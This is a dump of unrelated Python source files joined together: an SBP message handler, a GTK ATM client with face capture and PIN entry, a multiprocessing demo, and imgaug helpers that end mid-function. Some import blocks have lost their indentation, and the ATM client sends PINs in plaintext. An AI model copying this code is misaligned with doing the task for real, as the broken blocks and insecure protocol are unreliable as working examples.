        for _ in range(int(math.ceil(float(len(msg.text)) / msg_length))):
            SmsBillable.create(msg)
|
handler.py | # Copyright (C) 2015-2021 Swift Navigation Inc.
# Contact: https://support.swiftnav.com
#
# This source is subject to the license found in the file 'LICENSE' which must
# be be distributed together with this source. All other rights reserved.
#
# THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A PARTICULAR PURPOSE.
"""
The :mod:`sbp.client.handler` module contains classes related to
SBP message handling.
"""
import warnings
import collections
import threading
import weakref
import six
from six.moves.queue import Queue
try:
from typing import Optional # noqa
except ImportError:
pass
class Handler(object):
    """
    Handler

    The :class:`Handler` class provides an interface for connecting handlers
    to a driver providing SBP messages. Also provides queued and filtered
    iterators for synchronous, blocking use in other threads.

    Parameters
    ----------
    source : Iterable of tuple(SBP message, {'time':'ISO 8601 str'})
        Stream of SBP messages
    autostart : Boolean
        If false, start() shall be skipped when entering context scope and it
        should be explicitly called by the parent. This will prevent losing
        messages in case where receive thread would otherwise be started before
        consumers are ready.
    """

    def __init__(self, source, autostart=True):
        self._autostart = autostart
        self._source = source
        # Maps msg_type -> set of callbacks; the key None holds global
        # callbacks that fire for every message type.
        self._callbacks = collections.defaultdict(set)
        self._receive_thread = threading.Thread(
            target=self._recv_thread, name="Handler")
        self._receive_thread.daemon = True
        self._sinks = []  # This is a list of weakrefs to upstream iterators
        self._dead = False
        self._exception = None
        self._write_lock = threading.Lock()

    def _recv_thread(self):
        """
        Internal thread to iterate over source messages and dispatch callbacks.
        """
        def gen_messages():
            for msg, metadata in self._source:
                # Messages with a falsy msg_type are dropped here.
                if msg.msg_type:
                    yield (msg, metadata)
        messages = gen_messages()
        while True:
            msg_and_metadata = None
            try:
                msg_and_metadata = next(messages, None)
            except Exception as exc:
                # Remember the source failure so it can be re-raised in the
                # consumer threads (via breakiter below).
                self._exception = exc
                break
            if msg_and_metadata is None:
                break
            msg, metadata = msg_and_metadata
            self._call(msg, **metadata)
        # Break any upstream iterators
        for sink in self._sinks:
            i = sink()
            if i is not None:
                i.breakiter(self._exception)
        self._dead = True

    def __enter__(self):
        if self._autostart:
            self.start()
        return self

    def __exit__(self, *args):
        self.stop()

    # This exception is raised when a message is dispatched to a garbage
    # collected upstream iterator.
    class _DeadCallbackException(Exception):
        pass

    def filter(self, msg_type=None, maxsize=0):
        """
        Get a filtered iterator of messages for synchronous, blocking use in
        another thread.
        """
        if self._dead:
            return iter(())
        iterator = Handler._SBPQueueIterator(maxsize)
        # We use a weakref so that the iterator may be garbage collected if
        # its consumer no longer has a reference.
        ref = weakref.ref(iterator)
        self._sinks.append(ref)
        def feediter(msg, **metadata):
            i = ref()
            if i is not None:
                i(msg, **metadata)
            else:
                raise Handler._DeadCallbackException
        self.add_callback(feediter, msg_type)
        return iterator

    def __iter__(self):
        """
        Get a queued iterator that will provide the same unfiltered messages
        read from the source iterator.
        """
        return self.filter()

    def _to_iter(self, maybe_iter):
        # Returns an iterator for iterable msg_type arguments, or None for
        # scalar (single msg_type / None) arguments.
        try:
            return iter(maybe_iter)
        except TypeError:
            return None

    def add_callback(self, callback, msg_type=None):
        """
        Add per message type or global callback.

        Parameters
        ----------
        callback : fn
            Callback function
        msg_type : int | iterable
            Message type to register callback against. Default `None` means global callback.
            Iterable type adds the callback to all the message types.
        """
        cb_keys = self._to_iter(msg_type)
        if cb_keys is not None:
            for msg_type_ in cb_keys:
                self._callbacks[msg_type_].add(callback)
        else:
            self._callbacks[msg_type].add(callback)

    def remove_callback(self, callback, msg_type=None):
        """
        Remove per message type or global callback.

        Parameters
        ----------
        callback : fn
            Callback function
        msg_type : int | iterable
            Message type to remove callback from. Default `None` means the
            callback is removed from every registered message type.
            Iterable type removes the callback from all the message types.
        """
        if msg_type is None:
            msg_type = self._callbacks.keys()
        cb_keys = self._to_iter(msg_type)
        if cb_keys is not None:
            for msg_type_ in cb_keys:
                try:
                    self._callbacks[msg_type_].remove(callback)
                except KeyError:
                    # Callback was not registered for this type; ignore.
                    pass
        else:
            self._callbacks[msg_type].remove(callback)

    def _gc_dead_sinks(self):
        """
        Remove any dead weakrefs.
        """
        deadsinks = []
        for i in self._sinks:
            if i() is None:
                deadsinks.append(i)
        for i in deadsinks:
            self._sinks.remove(i)

    def _get_callbacks(self, msg_type):
        """
        Return all callbacks (global and per message type) for a message type.

        Parameters
        ----------
        msg_type : int
            Message type to return callbacks for.
        """
        return self._callbacks[None] | self._callbacks[msg_type]

    def _call(self, msg, **metadata):
        """
        Process message with all callbacks (global and per message type).
        """
        if msg.msg_type:
            for callback in self._get_callbacks(msg.msg_type):
                try:
                    callback(msg, **metadata)
                except Handler._DeadCallbackException:
                    # The callback was an upstream iterator that has been garbage
                    # collected. Remove it from our internal structures.
                    self.remove_callback(callback)
                    self._gc_dead_sinks()
                except SystemExit:
                    raise
                except:
                    # A failing callback must not kill the receive thread;
                    # report and continue with the remaining callbacks.
                    import traceback
                    traceback.print_exc()

    def start(self):
        """
        Start processing SBP messages with handlers.
        """
        self._receive_thread.start()

    def stop(self):
        """
        Stop processing SBP messages.
        """
        try:
            self._source.breakiter()
            self._receive_thread.join(0.1)
        except Exception as exc:
            warnings.warn("Handler stop error: %s" % (exc,))

    def join(self, timeout=None):
        # Wait for the receive thread to terminate.
        self._receive_thread.join(timeout)

    def is_alive(self):
        """
        Return whether the processes thread is alive.
        """
        return self._receive_thread.is_alive()

    def wait(self, msg_type, timeout=1.0):
        """
        Wait for a SBP message.

        Parameters
        ----------
        msg_type : int
            SBP message type.
        timeout : float
            Waiting period

        Returns the matching message, or None if the timeout elapsed first.
        """
        event = threading.Event()
        payload = {'data': None}
        def cb(sbp_msg, **metadata):
            payload['data'] = sbp_msg
            event.set()
        self.add_callback(cb, msg_type)
        event.wait(timeout)
        self.remove_callback(cb, msg_type)
        return payload['data']

    def wait_callback(self, callback, msg_type=None, timeout=1.0):
        """
        Wait for a SBP message with a callback.

        Parameters
        ----------
        callback : fn
            Callback function
        msg_type : int | iterable
            Message type to register callback against. Default `None` means global callback.
            Iterable type adds the callback to all the message types.
        timeout : float
            Waiting period
        """
        event = threading.Event()
        def cb(msg, **metadata):
            callback(msg, **metadata)
            event.set()
        self.add_callback(cb, msg_type)
        event.wait(timeout)
        self.remove_callback(cb, msg_type)

    def __call__(self, *msgs, **metadata):
        """
        Pass messages to the `source` to be consumed. Typically this means
        the messages will be framed and transmitted via whatever transport
        layer is currently active.

        Parameters
        ----------
        msgs : SBP messages
            SBP messages to send.
        metadata : dict
            Metadata for this batch of messages, passed to the `source`.
        """
        with self._write_lock:
            self._source(*msgs, **metadata)

    class _SBPQueueIterator(six.Iterator):
        """
        Class for upstream iterators. Implements callable interface for adding
        messages into the queue, and iterable interface for getting them out.
        """
        def __init__(self, maxsize):
            self._queue = Queue(maxsize)
            self._broken = False
            self._exception = None  # type: Optional[Exception]

        def __iter__(self):
            return self

        def __call__(self, msg, **metadata):
            # Non-blocking put: raises queue.Full if the consumer is too slow.
            self._queue.put((msg, metadata), False)

        def breakiter(self, exc=None):
            # Sentinel None unblocks a consumer waiting in __next__.
            self._broken = True
            self._exception = exc
            self._queue.put(None, True, 1.0)

        def __next__(self):
            if self._broken and self._queue.empty():
                raise StopIteration
            m = self._queue.get(True)
            if self._broken and m is None:
                # Re-raise the source's failure in the consumer thread, if any.
                if self._exception is not None:
                    raise self._exception
                raise StopIteration
            return m
|
atminterface.py | #!/usr/bin/env python
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, GObject, Gdk, GLib
from thread import *
import time
import socket
import subprocess
import threading
from imutils import face_utils
import numpy as np
import argparse
import imutils
import dlib
import cv2
from sympy import Point, Line, mpmath
from mpmath import *
from operator import itemgetter
import base64
from sendfile import sendfile
#Informacije o uredaju
INTERFACEID = "28734682"
#Informacije o serveru
#HOST = '127.0.0.1'
HOST = '192.168.1.10'
PORT = 8888
ADDR = (HOST,PORT)
#Stvaranje socketa
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Klasa za rad sa GUI-jem -> GTK
# Class for working with the GUI -> GTK (Python 2).
class GUI:
    def calculateFaceTilt(self, leftEye, rightEye):
        """Return the head-tilt angle (degrees) from the two eye points."""
        zeroLine = Line(Point(1, 0), Point(0, 0))
        eyeMiddlePoint = Point((leftEye + rightEye) / 2)
        eyeLine = Line(leftEye, rightEye)
        angle = mpmath.degrees(eyeLine.angle_between(zeroLine))
        # Sign of the tilt depends on which eye sits higher.
        if (leftEye.y > rightEye.y):
            return int(angle) - 180
        else:
            return 180 - int(angle)
    def rotateImage(self, imageObj, correctionAngle, nosePoint):
        """Rotate the image around the nose point by the correction angle."""
        rotationMatrix = cv2.getRotationMatrix2D(nosePoint, correctionAngle, 1.0)
        return cv2.warpAffine(imageObj, rotationMatrix, (imageObj.shape[1], imageObj.shape[0]), flags=cv2.INTER_LINEAR)
    def waitForResponse(self):
        """Block until the server replies; return the split components of a
        non-"ok" response, or fall through on "ok"/connection close."""
        while True:
            data = client.recv(1024)
            if not data: break
            components = data.split(":")
            if components[0] == "ok":
                break
            else:
                return components
    def sendFaceImages(self):
        """Normalize the captured face samples (align, crop, equalize,
        resize) and upload them to the server."""
        self.statusLabel.set_text("Obrada uzoraka")
        detector = dlib.get_frontal_face_detector()
        predictor = dlib.shape_predictor("ldm.dat")
        for i in range(0, 7):
            gray = cv2.imread("Camera/Resources/" + str(i) + '.png', cv2.CV_8UC1)
            #gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
            rects = detector(gray, 1)
            # loop over the face detections
            for (j, rect) in enumerate(rects):
                shape = predictor(gray, rect)
                shape = face_utils.shape_to_np(shape)
                # Landmarks 39/42 are the inner eye corners; 33 is the nose tip.
                angle = self.calculateFaceTilt(Point(shape[39]), Point(shape[42]))
                gray = self.rotateImage(gray, angle, tuple(shape[33]))
            #gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
            rects = detector(gray, 1)
            # loop over the face detections
            for (k, rect) in enumerate(rects):
                shape = predictor(gray, rect)
                shape = face_utils.shape_to_np(shape)
                eye = Point(shape[37])
                eyebrow = Point(shape[19])
                left = Point(min(shape, key=itemgetter(0)))
                top = Point(min(shape, key=itemgetter(1)))
                right = Point(max(shape, key=itemgetter(0)))
                bottom = Point(max(shape, key=itemgetter(1)))
                gray = gray[int(top.y - eye.distance(eyebrow) / 2):int(top.y + top.distance(bottom)),
                    int(left.x):int(left.x + left.distance(right))]
                # Histogram equalization.
                clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
                gray = clahe.apply(gray)
                #gray = cv2.bilateralFilter(gray, 9, 75, 75)
                ratio = 300.0 / gray.shape[1]
                dimensions = (300, int(gray.shape[0] * ratio))
                gray = cv2.resize(gray, dimensions, interpolation=cv2.INTER_AREA)
                cv2.imwrite("Camera/Resources/" + str(i) + '.png', gray)
        for i in range(0, 7):
            self.statusLabel.set_text("Slanje uzoraka")
            client.send("ftp:" + str(i))
            self.waitForResponse()
            imageFile = open("Camera/Resources/" + str(i) + '.png', "rb")
            offset = 0
            while True:
                # Zero-copy transfer of the image file over the socket.
                sent = sendfile(client.fileno(), imageFile.fileno(), offset, 4096)
                if sent == 0:
                    client.send("EOF")
                    break # EOF
                offset += sent
        self.statusLabel.set_text("Potvrdite PIN")
        self.btnConfirm.set_sensitive(True)
        self.waitForResponse()
    def waitForTokenApproval(self):
        """Background wait for the server's token approval decision."""
        response = self.waitForResponse()[1]
        if response == "ok":
            self.statusLabel.set_text("Token odobren")
        else:
            self.statusLabel.set_text("Token odbijen")
    def sendPIN(self):
        """Send the entered PIN and react to the authentication verdict."""
        client.send("pin:" + str(self.inputPin.get_text()))
        key, pinmessage, authmessage, token = self.waitForResponse()
        if key == "ath":
            if pinmessage == "pin;ok":
                if authmessage == "fce;ok":
                    self.statusLabel.set_text("Uspjesno!")
                elif authmessage == "fce;fls":
                    # Face auth failed; show the fallback token and wait for
                    # remote approval in a background thread.
                    self.statusLabel.set_text("Token: " + token.split(";")[1])
                    thread = threading.Thread(target=self.waitForTokenApproval)
                    thread.daemon = True
                    thread.start()
            else:
                self.statusLabel.set_text("Neuspjesno!")
    def sendAccountNumber(self):
        """Send the selected account number to the server."""
        client.send("acc:" + str(self.getActiveComboItem()))
        self.waitForResponse()
    def sendInterfaceId(self):
        """Identify this terminal to the server."""
        client.send("ifc:" + INTERFACEID)
        self.waitForResponse()
    def sendInformation(self, zero):
        # Full handshake: terminal id, account number, then face samples.
        self.sendInterfaceId()
        self.sendAccountNumber()
        self.sendFaceImages()
    # Capture face samples and invoke the sending method.
    def getFaceImages(self, zero):
        """Run the external FaceTracker process and react to its output."""
        self.statusLabel.set_text("Uzimanje uzoraka")
        cameraProc = subprocess.Popen(["./FaceTracker"], stdout=subprocess.PIPE, cwd="Camera", shell=True, bufsize=1)
        with cameraProc.stdout:
            for line in iter(cameraProc.stdout.readline, b''):
                print line
                if line == 'faceFound\n':
                    self.sendInformation(0)
                elif line == 'faceNotFound\n':
                    self.statusLabel.set_text("Lice nije\ndetektirano!")
                elif line == 'usbNotFound\n':
                    self.statusLabel.set_text("Problem s\nkamerom")
        cameraProc.wait()
    def getActiveComboItem(self):
        """Return the selected account number, or None for the placeholder."""
        index = self.cbxAccountNum.get_active()
        model = self.cbxAccountNum.get_model()
        if index == 0:
            return None
        return model[index][0]
    def isAccountSelected(self):
        """True when something other than the placeholder row is selected."""
        index = self.cbxAccountNum.get_active()
        if index == 0:
            return False
        else:
            return True
    def on_infoWindow2_activate_default(self, data=None):
        self.response = self.infoWindow2.show()
        self.infoWindow2.hide()
    def on_hideInfoWindow2_clicked(self, object):
        self.infoWindow2.hide()
    def on_infoWindow_activate_default(self, data=None):
        self.response = self.infoWindow.show()
        self.infoWindow.hide()
    def on_gtk_about_activate(self, menuitem, data=None):
        self.response = self.aboutDialog.run()
        #self.response = self.infoWindow.show()
        self.aboutDialog.hide()
    def on_window1_destroy(self, object, data=None):
        Gtk.main_quit()
    # Numeric keypad handlers: append the pressed digit to the PIN field.
    def on_btnZero_clicked(self, object):
        self.inputPin.insert_text("0", position = -1)
    def on_btnOne_clicked(self, object):
        self.inputPin.insert_text("1", position = -1)
    def on_btnTwo_clicked(self, object):
        self.inputPin.insert_text("2", position = -1)
    def on_btnThree_clicked(self, object):
        self.inputPin.insert_text("3", position = -1)
    def on_btnFour_clicked(self, object):
        self.inputPin.insert_text("4", position = -1)
    def on_btnFive_clicked(self, object):
        self.inputPin.insert_text("5", position = -1)
    def on_btnSix_clicked(self, object):
        self.inputPin.insert_text("6", position = -1)
    def on_btnSeven_clicked(self, object):
        self.inputPin.insert_text("7", position = -1)
    def on_btnEight_clicked(self, object):
        self.inputPin.insert_text("8", position = -1)
    def on_btnNine_clicked(self, object):
        self.inputPin.insert_text("9", position = -1)
    def on_btnReset_clicked(self, object):
        # Reset the UI to its initial "insert card" state.
        self.inputPin.set_text("")
        self.statusLabel.set_text("Umetnite\nkarticu")
        self.btnConfirm.set_sensitive(False)
        self.cbxAccountNum.set_active(0)
        #client.close()
    # Card inserted / account chosen.
    def on_cbxAccountNum_changed(self, object):
        print "Racun odabran."
        if self.isAccountSelected():
            start_new_thread(self.getFaceImages,(0,))
    def on_btnConfirm_clicked(self, object):
        # PINs are exactly 4 digits.
        if self.inputPin.get_text_length() == 4:
            self.sendPIN()
        #client.close()
    def on_gtk_quit_activate(self, menuitem, data=None):
        Gtk.main_quit()
    def __init__(self):
        """Load the Glade layout, wire signals, and show the main window."""
        self.gladefile = "gui.glade"
        self.builder = Gtk.Builder()
        self.builder.add_from_file(self.gladefile)
        self.builder.connect_signals(self)
        # Window definitions.
        self.mainWindow = self.builder.get_object("mainWindow")
        self.aboutDialog = self.builder.get_object("aboutDialog")
        self.infoWindow = self.builder.get_object("infoWindow")
        self.infoWindow2 = self.builder.get_object("infoWindow2")
        # GUI element definitions.
        self.statusLabel = self.builder.get_object("statusLabel")
        self.inputPin = self.builder.get_object("inputPin")
        self.cbxAccountNum = self.builder.get_object("cbxAccountNum")
        self.btnOne = self.builder.get_object("btnOne")
        self.btnTwo = self.builder.get_object("btnTwo")
        self.btnThree = self.builder.get_object("btnThree")
        self.btnFour = self.builder.get_object("btnFour")
        self.btnFive = self.builder.get_object("btnFive")
        self.btnSix = self.builder.get_object("btnSix")
        self.btnSeven = self.builder.get_object("btnSeven")
        self.btnEight = self.builder.get_object("btnEight")
        self.btnNine = self.builder.get_object("btnNine")
        self.btnZero = self.builder.get_object("btnZero")
        self.btnReset = self.builder.get_object("btnReset")
        self.btnConfirm = self.builder.get_object("btnConfirm")
        # infowindow
        self.infoTitle = self.builder.get_object("infoTitle")
        self.infoText = self.builder.get_object("infoText")
        # infowindow2
        self.infoTitle2 = self.builder.get_object("infoTitle2")
        self.infoText2 = self.builder.get_object("infoText2")
        # Populate the combo box.
        self.store = self.builder.get_object("accNums")
        self.cbxAccountNum.set_model(self.store)
        self.cell = Gtk.CellRendererText()
        self.cbxAccountNum.pack_start(self.cell, True)
        self.cbxAccountNum.add_attribute(self.cell, 'text', 0)
        self.cbxAccountNum.set_active(0)
        self.btnConfirm.set_sensitive(False)
        # Show the main window.
        self.mainWindow.show()
if __name__ == "__main__":
    # Connect to the authentication server before building the GUI.
    try:
        client.connect(ADDR)
    except socket.error as msg:
        print "Nemogucnost spajanja na autentikacijski server. Error: " + str(msg[0]) + " Poruka: " + msg[1]
        exit()
    GObject.threads_init()
    main = GUI()
    Gtk.main()
|
process_attr.py | """
进程模块使用,基础示例
"""
# 不能选带横线的
from multiprocessing import Process
from time import sleep
a = 1
# 进程执行函数
def fun():
    """Body of the child process: print status, report the process object's
    liveness, sleep two seconds, then finish."""
    print("开始运行第一个进程")
    # `p` is the module-level Process object created below.
    print(p.is_alive())
    sleep(2)
    print("第一个进程结束")
    # print(p.is_alive())
# Instantiate the process object (daemon child named "Aid").
p = Process(target=fun, name="Aid",daemon=True)
p.start()
print("第二个进程开始运行")
sleep(1)
print("第二个进程结束")
# Inspect the child's attributes from the parent process.
print(p.name)
print(p.pid)
print(p.is_alive())
|
imgaug.py | from __future__ import print_function, division, absolute_import
import random
import numpy as np
import copy
import numbers
import cv2
import math
from scipy import misc, ndimage
import multiprocessing
import threading
import sys
import six
import six.moves as sm
import os
from skimage import draw
if sys.version_info[0] == 2:
import cPickle as pickle
from Queue import Empty as QueueEmpty
elif sys.version_info[0] == 3:
import pickle
from queue import Empty as QueueEmpty
xrange = range
ALL = "ALL"
# filepath to the quokka image
QUOKKA_FP = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"quokka.jpg"
)
DEFAULT_FONT_FP = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"DejaVuSans.ttf"
)
# We instantiate a current/global random state here once.
# One can also call np.random, but that is (in contrast to np.random.RandomState)
# a module and hence cannot be copied via deepcopy. That's why we use RandomState
# here (and in all augmenters) instead of np.random.
CURRENT_RANDOM_STATE = np.random.RandomState(42)
def is_np_array(val):
    """Return True if *val* is a numpy ``ndarray``.

    Numpy scalar values (``np.generic``) are deliberately excluded: testing
    against ``np.generic`` would also fire for scalars, which are not arrays.
    """
    result = isinstance(val, np.ndarray)
    return result
def is_single_integer(val):
    """Return True if *val* is a single integral number.

    Any ``numbers.Integral`` counts (python ints, numpy integer scalars,
    and bool, which subclasses int).
    """
    return isinstance(val, numbers.Integral)
def is_single_float(val):
    """Return True if *val* is a single real number that is not integral.

    Equivalent to ``isinstance(val, numbers.Real) and not
    is_single_integer(val)`` with the helper call inlined.
    """
    if isinstance(val, numbers.Integral):
        return False
    return isinstance(val, numbers.Real)
def is_single_number(val):
    """Return True if *val* is a single number, i.e. an integer or float.

    The union of is_single_integer (``numbers.Integral``) and
    is_single_float (``numbers.Real`` minus ``Integral``) is exactly
    ``numbers.Real``, so one isinstance check suffices.
    """
    return isinstance(val, numbers.Real)
def is_iterable(val):
    """Return True if *val* is a tuple or a list.

    Other iterables (strings, sets, generators, ...) are deliberately not
    accepted here.
    """
    # TODO make this more abstract, not just restricted to tuple/list
    return isinstance(val, (list, tuple))
# TODO convert to is_single_string() or rename is_single_integer/float/number()
def is_string(val):
    """Return True if *val* is a string (``six.string_types`` covers both
    py2 ``str``/``unicode`` and py3 ``str``)."""
    result = isinstance(val, six.string_types)
    return result
def is_integer_array(val):
    """Return True if *val* is a numpy array with an integer dtype.

    The is_np_array helper is inlined here: non-arrays fail fast before the
    dtype check.
    """
    if not isinstance(val, np.ndarray):
        return False
    return issubclass(val.dtype.type, np.integer)
def is_callable(val):
    """Return True if *val* can be called like a function."""
    # Python 3.0-3.2 lacked the callable() builtin; fall back to checking
    # for __call__ there.
    if sys.version_info[0] == 3 and sys.version_info[1] <= 2:
        return hasattr(val, '__call__')
    return callable(val)
def seed(seedval):
    """
    Set the seed used by the global random state and thereby all randomness
    in the library.

    This random state is used by default by all augmenters. Under special
    circumstances (e.g. when an augmenter is switched to deterministic mode),
    the global random state is replaced by another -- local -- one.
    The replacement is dependent on the global random state.

    Parameters
    ----------
    seedval : int
        The seed to
        use.
    """
    CURRENT_RANDOM_STATE.seed(seedval)
def current_random_state():
    """
    Returns the current/global random state of the library.

    Returns
    -------
    out : np.random.RandomState
        The current/global random state.
    """
    return CURRENT_RANDOM_STATE
def new_random_state(seed=None, fully_random=False):
    """
    Returns a new random state.

    Parameters
    ----------
    seed : None or int, optional(default=None)
        Optional seed value to use.
        The same datatypes are allowed as for np.random.RandomState(seed).
    fully_random : bool, optional(default=False)
        Whether to use numpy's random initialization for the
        RandomState (used if set to True). If False, a seed is sampled from
        the global random state, which is a bit faster and hence the default.

    Returns
    -------
    out : np.random.RandomState
        The new random state.
    """
    if seed is None and not fully_random:
        # Sampling a seed manually is much faster than letting RandomState()
        # initialize itself from OS entropy.
        seed = CURRENT_RANDOM_STATE.randint(0, 10**6, 1)[0]
    return np.random.RandomState(seed)
def dummy_random_state():
    """
    Returns a dummy random state that is always based on a seed of 1.

    Returns
    -------
    out : np.random.RandomState
        The new random state.
    """
    rs = np.random.RandomState(1)
    return rs
def copy_random_state(random_state, force_copy=False):
    """
    Creates a copy of a random state.

    Parameters
    ----------
    random_state : np.random.RandomState
        The random state to
        copy.
    force_copy : bool, optional(default=False)
        If True, this function will always create a copy of every random
        state. If False, it will not copy numpy's default random state,
        but all other random states.

    Returns
    -------
    rs_copy : np.random.RandomState
        The copied random state.
    """
    if not force_copy and random_state == np.random:
        # numpy's module-level default state is returned as-is unless a
        # copy is explicitly forced.
        return random_state
    # dummy_random_state() inlined: seed value is irrelevant since the
    # state is overwritten immediately.
    rs_copy = np.random.RandomState(1)
    rs_copy.set_state(random_state.get_state())
    return rs_copy
def derive_random_state(random_state):
    """Derive a single new random state from *random_state*
    (see derive_random_states)."""
    return derive_random_states(random_state, n=1)[0]
# TODO use this everywhere instead of manual seed + create
def derive_random_states(random_state, n=1):
    """Derive *n* new random states, seeded consecutively from one seed
    drawn out of *random_state*."""
    base_seed = random_state.randint(0, 10**6, 1)[0]
    # new_random_state(seed) with a non-None seed is just RandomState(seed);
    # sm.xrange and range produce identical results here.
    return [np.random.RandomState(base_seed + i) for i in range(n)]
def forward_random_state(random_state):
    """Advance *random_state* by one draw so subsequent samples differ."""
    random_state.uniform()
# TODO
# def from_json(json_str):
# pass
def quokka(size=None):
    """
    Returns an image of a quokka as a numpy array.

    Parameters
    ----------
    size : None or float or tuple of two ints, optional(default=None)
        Size of the output image. Input into scipy.misc.imresize.
        Usually expected to be a tuple (H, W), where H is the desired height
        and W is the width. If None, then the image will not be resized.

    Returns
    -------
    img : (H,W,3) ndarray
        The image array of dtype uint8.
    """
    # NOTE(review): ndimage.imread/misc.imresize were removed in newer scipy
    # releases -- verify the pinned scipy version supports them.
    img = ndimage.imread(QUOKKA_FP, mode="RGB")
    if size is not None:
        img = misc.imresize(img, size)
    return img
def quokka_square(size=None):
    """
    Load a square (643x643) crop of the bundled quokka example image.

    Parameters
    ----------
    size : None or float or tuple of two ints, optional(default=None)
        Target size, passed through to scipy.misc.imresize. Usually a
        (H, W) tuple with H the desired height and W the width.
        If None, the crop is returned at its native size.

    Returns
    -------
    img : (H,W,3) ndarray
        The image array of dtype uint8.
    """
    img = ndimage.imread(QUOKKA_FP, mode="RGB")[0:643, 0:643]
    if size is None:
        return img
    return misc.imresize(img, size)
def angle_between_vectors(v1, v2):
    """
    Compute the angle in radians between vectors `v1` and `v2`.

    Based on http://stackoverflow.com/questions/2827393/angles-between-two-n-dimensional-vectors-in-python

    Parameters
    ----------
    v1 : (N,) ndarray
        First input vector.
    v2 : (N,) ndarray
        Second input vector.

    Returns
    -------
    out : float
        Angle in radians.

    Examples
    --------
    >>> angle_between((1, 0, 0), (0, 1, 0))
    1.5707963267948966
    >>> angle_between((1, 0, 0), (1, 0, 0))
    0.0
    >>> angle_between((1, 0, 0), (-1, 0, 0))
    3.141592653589793
    """
    unit1 = v1 / np.linalg.norm(v1)
    unit2 = v2 / np.linalg.norm(v2)
    # clip guards against tiny float drift pushing the cosine outside [-1, 1]
    cos_angle = np.clip(np.dot(unit1, unit2), -1.0, 1.0)
    return np.arccos(cos_angle)
def draw_text(img, y, x, text, color=(0, 255, 0), size=25):
    """
    Draw text on an image.

    This uses by default DejaVuSans as its font, which is included in the
    library.

    Parameters
    ----------
    img : (H,W,3) ndarray
        The image array to draw text on.
        Expected to be of dtype uint8 or float32 (value range 0.0 to 255.0).
    y : int
        y-coordinate of the top left corner of the text.
    x : int
        x-coordinate of the top left corner of the text.
    color : iterable of 3 ints, optional(default=(0, 255, 0))
        Color of the text to draw. For RGB-images this is expected to be
        an RGB color. Float components are interpreted as fractions of 255.
    size : int, optional(default=25)
        Font size of the text to draw.

    Returns
    -------
    img_np : (H,W,3) ndarray
        Input image with text drawn on it.
    """
    # keeping PIL here so that it is not a dependency of the library right now
    from PIL import Image, ImageDraw, ImageFont
    do_assert(img.dtype in [np.uint8, np.float32])
    input_dtype = img.dtype
    if img.dtype == np.float32:
        img = img.astype(np.uint8)
    # BUGFIX: the original code wrote normalized values back into `color`
    # itself (`color[i] = val`), mutating the caller's list and -- because
    # the default was a mutable list -- the shared default value across
    # calls. Build a fresh list instead.
    color_norm = []
    for val in color:
        if isinstance(val, float):
            val = int(val * 255)
        color_norm.append(int(np.clip(val, 0, 255)))
    img = Image.fromarray(img)
    font = ImageFont.truetype(DEFAULT_FONT_FP, size)
    context = ImageDraw.Draw(img)
    context.text((x, y), text, fill=tuple(color_norm), font=font)
    img_np = np.asarray(img)
    img_np.setflags(write=True)  # PIL/asarray returns read only array
    if img_np.dtype != input_dtype:
        img_np = img_np.astype(input_dtype)
    return img_np
def imresize_many_images(images, sizes=None, interpolation=None):
    """
    Resize a batch of images to a specified size.

    Parameters
    ----------
    images : (N,H,W,C) ndarray
        Array of the images to resize.
        Expected to usually be of dtype uint8.
    sizes : iterable of two ints
        The new size in (height, width) format.
    interpolation : None or string or int, optional(default=None)
        The interpolation to use during resize. May be one of the cv2
        constants cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_AREA,
        cv2.INTER_CUBIC, or the equivalent strings "nearest", "linear",
        "area", "cubic". If None, area interpolation is chosen for size
        increases and linear interpolation otherwise.

    Returns
    -------
    result : (N,H',W',C) ndarray
        Array of the resized images (dtype uint8).
    """
    shape = images.shape
    do_assert(len(shape) == 4, shape)
    nb_images, im_height, im_width, nb_channels = shape
    height, width = sizes[0], sizes[1]
    if (height, width) == (im_height, im_width):
        return np.copy(images)
    valid = ["nearest", "linear", "area", "cubic",
             cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_AREA, cv2.INTER_CUBIC]
    do_assert(interpolation is None or interpolation in valid)
    if interpolation is None:
        # NOTE(review): area interpolation is picked for size *increases*
        # and linear otherwise -- inverted relative to the usual cv2
        # recommendation, but preserved here as existing behavior.
        ip = cv2.INTER_AREA if (height > im_height or width > im_width) else cv2.INTER_LINEAR
    elif interpolation in ["nearest", cv2.INTER_NEAREST]:
        ip = cv2.INTER_NEAREST
    elif interpolation in ["linear", cv2.INTER_LINEAR]:
        ip = cv2.INTER_LINEAR
    elif interpolation in ["area", cv2.INTER_AREA]:
        ip = cv2.INTER_AREA
    elif interpolation in ["cubic", cv2.INTER_CUBIC]:
        ip = cv2.INTER_CUBIC
    else:
        raise Exception("Invalid interpolation order")
    result = np.zeros((nb_images, height, width, nb_channels), dtype=np.uint8)
    for img_idx in sm.xrange(nb_images):
        # TODO fallback to scipy here if image isn't uint8
        resized = cv2.resize(images[img_idx], (width, height), interpolation=ip)
        if resized.ndim == 2:
            # cv2 drops the channel axis for single-channel images
            resized = resized[:, :, np.newaxis]
        result[img_idx] = resized
    return result
def imresize_single_image(image, sizes, interpolation=None):
    """
    Resize a single image.

    Parameters
    ----------
    image : (H,W,C) ndarray or (H,W) ndarray
        The image to resize. Expected to usually be of dtype uint8.
    sizes : iterable of two ints
        See `imresize_many_images()`.
    interpolation : None or string or int, optional(default=None)
        See `imresize_many_images()`.

    Returns
    -------
    out : (H',W',C) ndarray or (H',W') ndarray
        The resized image. Grayscale (2d) inputs yield grayscale outputs.
    """
    grayscale = (image.ndim == 2)
    if grayscale:
        # add a channel axis so the batched resizer can handle it
        image = image[:, :, np.newaxis]
    do_assert(len(image.shape) == 3, image.shape)
    resized = imresize_many_images(image[np.newaxis, :, :, :], sizes, interpolation=interpolation)
    if grayscale:
        return np.squeeze(resized[0, :, :, 0])
    return resized[0, ...]
def draw_grid(images, rows=None, cols=None):
    """
